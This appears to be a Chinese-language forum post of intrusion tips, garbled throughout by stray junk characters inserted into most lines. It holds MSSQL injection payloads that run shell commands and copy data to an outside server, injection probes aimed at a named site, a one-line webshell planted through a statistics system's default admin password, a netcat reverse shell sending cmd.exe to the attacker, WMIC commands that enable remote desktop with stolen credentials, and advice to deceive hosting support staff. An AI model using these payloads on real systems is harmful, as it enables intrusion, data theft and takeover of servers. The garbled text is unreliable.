SA点数据库分离技术相关) J! F2 ~: w4 l
2 |% F/ l1 b6 j; G( i
: B& l* q3 i5 o& jSA点数据库分离搞法+语句:
$ ^9 `! A0 M7 x
+ s* R3 e0 u1 W3 w3 m注射点不显错,执行下面三条语句页面都返回正常。
e( R8 v3 C8 Land 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') a, b; C2 t& K# {0 n2 t7 A* H, G% m
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
( {4 K P: q# @: uand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
+ i z8 @1 o0 B! z可以列目录,判断系统为2000,web与数据库分离7 P& y* F# |0 l2 @
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
o9 a+ f$ r2 O ^在注射点上执行
, L, x* b8 h: p6 b8 t( u3 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--+ d9 \' V" a; A/ Y
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP9 U$ D7 K9 Z- \' S/ d; Y) y5 A4 {, m7 Z
还有我用NC监听得其他端口都没有得到IP。
- H* a/ q ~6 h- w* @6 G4 X; u; h5 i2 F4 x2 d" y9 S x7 g
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
Q& L o; d; x. y/ d# A'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--1 M& K; _0 ?9 r/ G& V3 n
0 P7 u+ e& x' z: d8 x0 f;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
6 v1 |1 K7 k) B1 Q; H( {" m* {
. `, ^7 D9 t1 ~2 b' q现在就猜想是不是数据库是内网而且不能连外网。
* e9 ]! K6 q% C, ^; t3 f8 r- {$ d8 |% B5 M& _) I
: n% V; E. v# a( T( t9 X6 n
access导出txt文本代码
6 e7 E: @+ Z3 `9 @" \- U8 SSELECT * into [test.txt] in 'd:\web\' 'text;' from admin7 y: |$ W6 `8 ? L2 c; S! H
% D+ E) U4 J* | h- L
: {! @) M3 W( W. Z' f7 }
+ k m8 P- x7 }/ [: G. r7 C自动跳转到指定网站代码头
4 ]" k; {/ H/ f$ g2 a9 ]<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>$ a- z" z, W! A, p1 `" q3 x! \. ?
% G- a4 W7 O+ e" s/ E4 I9 g U. N) M+ b- K' \1 q A8 R( K
入侵java or jsp站点时默认配置文件路径:- ?0 O V( B- h% J, U
\web-inf\web.xml
E8 v& \! m) X/ V9 ltomcat下的配置文件位置:
: r; ~0 O. f$ |: ~5 S& z. n\conf\server.xml (前面加上tomcat路径)) S6 U3 X$ n Q& S' h
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
+ Z' S; {( T9 H# N8 k3 J% N# T( G' \
( B, n8 B( R5 d- J9 Y6 }
9 ?) F( v% \% t: A6 c+ v/ a' v+ ^6 P4 V- v6 J& ]5 F' y7 b' ?
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
7 t6 I, e$ Y6 a; H* n-1%237 v p& T+ a" H* X
> 7 }8 U) q4 _( Q9 U
<& g3 s! v5 I% U
1'+or+'1'='1+ P* S3 e v/ w- d+ d9 ~9 _
id=8%bf
; V) ?. b! ^- W% S" a
& u* U6 r! [( \5 W- v5 @全新注入点检测试法:
L9 c& m2 D# R% S4 v8 k" n在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。1 v) ~( K& b1 S0 w
7 M7 b/ e7 W% ?% I
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
1 R2 h2 L6 A. w$ v4 x1 S+ U
. V- W: f" ~$ l$ E& R/ l搜索型注入判断方法:
5 @; v1 x) \4 U; l1 G; T北京%' and '1'='1' and '%'='4 {+ u7 F- w8 F3 M
北京%' and '1'='2' and '%'='
, J; m4 a! {( g
( P6 b4 ^; J1 ]7 p# |, v
8 k; d4 @0 u) I& k& P7 wCOOKIES注入:8 D& t# @$ |6 {7 p3 b' \
# O; j; H) L" u4 L, t* S! L+ C" Xjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
$ W0 ], q* f! \: j- o6 t y* F5 o( n( [1 I( R, `
2000专业版查看本地登录用户命令:4 E! H! T: l& X% @1 [2 r8 u
net config workstation4 t( r8 E, g$ H& t7 a. _& m! r
0 i1 Z( \6 {( F( N. c
3 S1 I. Z5 }; [1 n2003下查看ipsec配置和默认防火墙配置命令:
% J1 e: X3 ?% R& [) f6 f- inetsh firewall show config+ B9 Y) ~- _+ ~! L" R, M( M
netsh ipsec static show all
% ?! P, u/ k' C; H
) E; H& q9 F/ T. z! Q" R- J不指派指定策略命令:: B3 |6 s& Z$ B' P
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)5 ]4 j, L4 N5 r
netsh ipsec static show policy all 显示策略名
% u5 u8 j0 N7 n3 I" ?- i- a' F- ]) E! H4 L' Z1 g1 @1 r) j* V) E
$ u2 b' m" A" h$ y# g* c猜管理员后台小技巧:
6 F- |" z& @# n( P9 J9 E- D, kadmin/left.asp 3 w6 \# d+ M. A, A, T4 u: ?
admin/main.asp6 k" `5 N' p) h
admin/top.asp
* p6 |3 F" s& R; p ?admin/admin.asp ' P/ D$ U. p$ D9 E/ K* A0 p
会现出菜单导航,然后迅雷下载全部链接% C% c" y# ~) R6 g: ]5 y
5 y# t# j& X- {) V) n6 B C
4 P9 ^/ ^8 ?1 l) P7 T0 G5 ^% L
社会工程学:
% z% ] L/ |* P用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
7 d+ J s' A( ?2 y9 M: t- O/ Y& c然后去骗客服* x5 E/ Y6 U4 r
2 J! ?7 A- e! {7 d) l6 L# f
" O' N* l: j; T: J, j统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 9 j# y. Q; l1 L
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, * a8 E- o" r3 z( r
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
4 b: K7 H# D& X0 |# g U" m6 ?- J, j8 z3 |5 |
; U+ y; o6 G2 W' v& q2 E/ O
: G8 [: v) m+ i" ?# I2 p- \) [6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)3 r: H, k$ \3 W: V
2 k+ k3 {3 Q2 q0 \5 A
" p+ z$ J5 z8 D
1 A1 x6 K& ?( R0 S8 @2 F; @CMD加密注册表位置6 {( K# t# C5 O* _
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
0 F- D0 q- J6 j' A& k% v( ?1 s6 F: X5 TAutoRun
5 ~+ y! y: }: g K; f( k5 I/ l: W- ?% s
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
& k+ t2 u& w# ~. `AutoRun9 F3 k# q. D0 C! V
' {: k c0 U- V A5 \
1 f$ i- _# H% K在找注入时搜索Hidden,把他改成test
$ X8 r N9 q: W) y
, r+ d* _6 `: k. n; k6 H; e
1 P8 H! e9 @4 ~4 ~
- F# [$ c# i" I( Pmstsc /v:IP /console R3 t# u! z7 H* _" F. O
7 z5 J s. Q. g' }2 g3 ?/ g' Y, E w: m& [8 Z4 \% H ]8 E- q
一句话开3389:2 s+ _5 e1 u1 N( S3 a- a
# V2 _- ^$ x$ R
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 5 P4 _" G/ C3 r! a
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.0 U$ h2 s" a8 J1 c
( Y9 G: _5 U/ E& [
- [0 N/ H1 j9 f6 m( O
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
/ G: Z$ p+ s) ^/ WInsert into admin(user,pwd) values('test','test')
6 m% p) {6 c% O- r: }$ _
% {# _' A) F5 M9 k5 j2 z
% `0 Z& u8 k. ~8 Q' k. oNC反弹- r' `, W. J( ^, V
先在本机执行: nc -vv -lp 监听的端口 (自己执行) 2 J! {8 f% H2 u, u6 Z: t
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)4 y7 D, O" P/ r% M1 g7 N. g
# c g0 \3 x4 r4 R' c
8 r, k+ a4 Y/ `. X0 U, c; w
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题" t5 Y0 r0 u+ t% c" t' |
* K9 r* V; D. r2 d
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录8 Q: z" L/ z$ n) m
例如:( h9 I! Y9 ?0 i+ r& ?7 S5 \
subst k: d:\www\ 用d盘www目录替代k盘
8 i; W6 d$ R0 S5 {5 C7 fsubst k: /d 解除K盘代替 |